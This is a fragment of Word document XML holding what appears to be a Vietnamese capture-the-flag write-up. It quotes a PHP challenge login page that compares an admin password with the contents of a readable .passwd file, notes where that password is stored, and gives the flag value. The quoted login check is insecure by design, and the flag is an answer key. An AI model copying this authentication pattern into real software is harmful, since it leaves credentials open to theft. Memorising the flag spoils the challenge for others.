    </w:p>
    <w:p w14:paraId="698A91F4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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040E2ED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2F287302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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD0D95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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102E8845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642E723E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if($_GET['action'] == "auth"){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E190AF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echo '&lt;strong&gt;Login&lt;/strong&gt;&lt;br /&gt;&lt;form METHOD="POST"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C78737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&lt;input type="text" name="username" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F1CF80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&lt;br /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB261B4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&lt;input type="password" name="password" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5B082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&lt;br /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B54071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&lt;input type="submit" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A02E02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&lt;/form&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6911CEDA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';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B397003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if(isset($_POST['username'], $_POST['password']) &amp;&amp; !empty($_POST['username']) &amp;&amp; !empty($_POST['password']))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158B15B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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13CD7D7B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$user=$_POST["username"];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D53834B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$pass=$_POST["password"];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E0A326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if($user === "admin" &amp;&amp; $pass === "".file_get_contents(".passwd").""){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FDFA68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    print "Flag: ".file_get_contents(".passwd")."&lt;br /&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6205161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    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782E146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1AD274CA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 xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D71F1C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55D131B7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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556D0A54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533211FB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</w:p>
    <w:p w14:paraId="42E89F61" w14:textId="77777777" w:rsidR="00E56C2C" w:rsidRPr="001B3F50" w:rsidRDefault="00E56C2C" w:rsidP="00E56C2C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B3F50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>echo '&lt;/body&gt;&lt;/html&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C75D628" w14:textId="713713DE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9021E5D" w14:textId="1153B339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30F5897" w14:textId="2CD3B801" w:rsidR="00E56C2C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Ở đây, bạn chú ý cho mình mật khẩu của admin nằm ở file .passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5146BB21" w14:textId="1D64335D" w:rsidR="001B3F50" w:rsidRDefault="001B3F50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Làm lại với cách tương tự </w:t>
      </w:r>
      <w:r w:rsidRPr="001B3F50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1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flag là </w:t>
      </w:r>
      <w:r w:rsidRPr="001B3F50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>c934fed17f1cac3045ddfeca34f332bc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AABBAD0" w14:textId="77777777" w:rsidR="00E56C2C" w:rsidRPr="00683E6F" w:rsidRDefault="00E56C2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sectPr w:rsidR="00E56C2C" w:rsidRPr="00683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E8"/>
    <w:rsid w:val="001B033D"/>
    <w:rsid w:val="001B3F50"/>
    <w:rsid w:val="00260B86"/>
    <w:rsid w:val="002A48E8"/>
    <w:rsid w:val="002E63E5"/>
    <w:rsid w:val="002F49FE"/>
    <w:rsid w:val="004F5D4C"/>
    <w:rsid w:val="00683E6F"/>
    <w:rsid w:val="009461FE"/>
    <w:rsid w:val="00BB07BA"/>
    <w:rsid w:val="00BD107F"/>
    <w:rsid w:val="00D60A2A"/>
    <w:rsid w:val="00E56C2C"/>
    <w:rsid w:val="00FB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B96BC"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{F13792B2-D464-D44B-981C-C6FD7703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character" w:customStyle="1" w:styleId="pl-ent">
    <w:name w:val="pl-ent"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="002E63E5"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-e">
    <w:name w:val="pl-e"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="002E63E5"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-s">
    <w:name w:val="pl-s"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="002E63E5"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-pds">
    <w:name w:val="pl-pds"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="002E63E5"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-k">
    <w:name w:val="pl-k"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="002E63E5"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-c1">
    <w:name w:val="pl-c1"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="002E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2022-11-10T08:38:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-11-10T09:32:00Z</dcterms:modified>
</cp:coreProperties>
</file>